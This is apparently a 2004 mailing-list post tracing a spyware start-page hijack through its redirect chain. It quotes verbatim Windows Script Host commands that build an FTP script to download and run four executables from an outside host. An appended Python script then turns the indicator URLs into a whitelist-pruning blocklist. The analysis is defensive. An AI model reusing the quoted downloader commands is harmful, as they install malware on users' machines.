My bad, I inadvertently included a message which was about trojan-like spyware, which is publicly available at:
http://seclists.org/lists/bugtraq/2004/May/0153.html
http://65.17.207.40/framepb_1u.php
which redirects to
http://si1.default-homepage-network.com/180/180.htm?si-001
which redirects to
http://object.passthison.com/vu083003/object.cgi?si1
which uses the Object Data vulnerability to change your startpage to
http://default-homepage-network.com/start.cgi?hkcu
the parameter at the end is either HKCU or HKLM depending on which registry branch led you there. This serves to notify default-homepage-network whether your machine has been compromised with user or administrator privileges.
start.cgi also opens a few popup windows with advertisements, after which it opens the following page
http://default-homepage-network.com/newspynotice.html
that wants to sell you a cure against spyware which hijacks your start page - as theirs just did.
That page also secretly opens
http://object.passthison.com/vu083003/newobject1.cgi http://69.50.139.61/hp1/hp1.htm http://www.achtungachtung.com/0021/index.php
newobject1.cgi executes the following commands through the Windows Script Host object:
wsh.Run('command /C echo open downloads.default-homepage-network.com>o',false,6);
wsh.Run('command /C echo tmpacct>>o',false,6);
wsh.Run('command /C echo 12345>>o',false,6);
wsh.Run('command /C echo bin>>o',false,6);
wsh.Run('command /C echo get install2.exe>>o',false,6);
wsh.Run('command /C echo get infamous_downloader.exe>>o',false,6);
wsh.Run('command /C echo get 0021-bdl94126.EXE>>o',false,6);
wsh.Run('command /C echo get CS4P028.exe>>o',false,6);
wsh.Run('command /C echo bye>>o',false,6);
wsh.Run('command /C echo if not exist %windir%\statuslog ftp -s:o >>o.bat',false,6);
wsh.Run('command /C echo if exist install2.exe install2.exe >>o.bat',false,6);
wsh.Run('command /C echo if exist infamous_downloader.exe infamous_downloader.exe >>o.bat',false,6);
wsh.Run('command /C echo if exist 0021-bdl94126.EXE 0021-bdl94126.EXE >>o.bat',false,6);
wsh.Run('command /C echo if exist CS4P028.exe CS4P028.exe >>o.bat',false,6);
wsh.Run('command /C o.bat',false,6);
Hp1.htm tries to exploit the Ibiza MHTML/CHM vulnerability to launch http://69.50.139.61/hp1/HP1.chm::/hp1.htm
framepb_1u.php also tries to open http://69.50.139.61/hp2/hp2.htm which uses Ibiza to launch http://69.50.139.61/hp2/hp2.chm::/hp2.htm
Other files that are attempted to be delivered are
http://www.addictivetechnologies.net/DM0/cab/emCraft1.cab http://www.addictivetechnologies.net/DM0/exe/emCraft1.exe http://validation-required.info/ http://www.popmoney.net/ip/index.php http://www.portalone.hostance.com.com/italia.exe
Therefore I am taking all those domains out of the possible whitelist.
Jeff C.
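The last step of the message, removing every domain in the redirect chain from a candidate whitelist, is the kind of thing that is easy to get wrong by hand (the `www.` prefix, the IP-literal hosts, and subdomains such as `si1.default-homepage-network.com`). The following Python script is an added example, not part of the post above; it takes the indicator URLs exactly as they appear in the message, derives a set of blocked hosts from them, and prunes a whitelist. The candidate whitelist (`CANDIDATE_WHITELIST`) is a constructed sample, not anything from the thread.

```python
import ipaddress
from urllib.parse import urlsplit

# Indicator URLs copied verbatim from the post above.
INDICATOR_URLS = [
    "http://65.17.207.40/framepb_1u.php",
    "http://si1.default-homepage-network.com/180/180.htm?si-001",
    "http://object.passthison.com/vu083003/object.cgi?si1",
    "http://default-homepage-network.com/start.cgi?hkcu",
    "http://default-homepage-network.com/newspynotice.html",
    "http://object.passthison.com/vu083003/newobject1.cgi",
    "http://69.50.139.61/hp1/hp1.htm",
    "http://www.achtungachtung.com/0021/index.php",
    "http://69.50.139.61/hp1/HP1.chm::/hp1.htm",
    "http://69.50.139.61/hp2/hp2.htm",
    "http://www.addictivetechnologies.net/DM0/cab/emCraft1.cab",
    "http://www.addictivetechnologies.net/DM0/exe/emCraft1.exe",
    "http://validation-required.info/",
    "http://www.popmoney.net/ip/index.php",
    "http://www.portalone.hostance.com.com/italia.exe",
]

# The FTP server named in the WSH batch script is not a URL in the post,
# so it is added explicitly.
EXTRA_HOSTS = {"downloads.default-homepage-network.com"}

# Constructed sample whitelist (assumption; not from the post).
CANDIDATE_WHITELIST = [
    "www.example.com",
    "news.example.org",
    "downloads.default-homepage-network.com",
    "69.50.139.61",
    "cdn.achtungachtung.com",
    "passthison.com",
    "popmoney.net",
]


def normalize_host(host):
    """Lower-case, strip a trailing dot and a leading 'www.' label."""
    host = host.lower().rstrip(".")
    if host.startswith("www."):
        host = host[4:]
    return host


def is_ip(host):
    """True for IPv4/IPv6 literals; suffix matching does not apply to them."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def extract_hosts(urls):
    """Set of normalized hostnames appearing in the given URLs."""
    hosts = set()
    for url in urls:
        h = urlsplit(url).hostname
        if h:
            hosts.add(normalize_host(h))
    return hosts


def build_blocklist():
    return extract_hosts(INDICATOR_URLS) | {normalize_host(h) for h in EXTRA_HOSTS}


def is_blocked(host, blocked):
    """IP literals must match exactly; domain names match themselves or any
    subdomain of a blocked name (e.g. cdn.achtungachtung.com)."""
    host = normalize_host(host)
    if is_ip(host):
        return host in blocked
    return any(host == b or host.endswith("." + b)
               for b in blocked if not is_ip(b))


def prune_whitelist(candidates, blocked):
    """Split candidates into (kept, dropped) according to the blocklist."""
    kept, dropped = [], []
    for c in candidates:
        (dropped if is_blocked(c, blocked) else kept).append(c)
    return kept, dropped


if __name__ == "__main__":
    blocked = build_blocklist()
    kept, dropped = prune_whitelist(CANDIDATE_WHITELIST, blocked)
    print("blocked hosts:", sorted(blocked))
    print("kept:", kept)
    print("dropped:", dropped)
```

Note the deliberate asymmetry: a listed host blocks its subdomains, but not its parent. `object.passthison.com` in the post therefore does not cause the bare `passthison.com` to be dropped; if you want parent domains removed too, add them to `EXTRA_HOSTS` explicitly rather than guessing at registrable-domain boundaries without a public-suffix list.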